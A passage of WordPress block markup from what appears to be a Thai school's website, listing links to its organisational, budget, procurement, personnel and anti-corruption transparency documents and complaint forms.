style=\"width:222px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/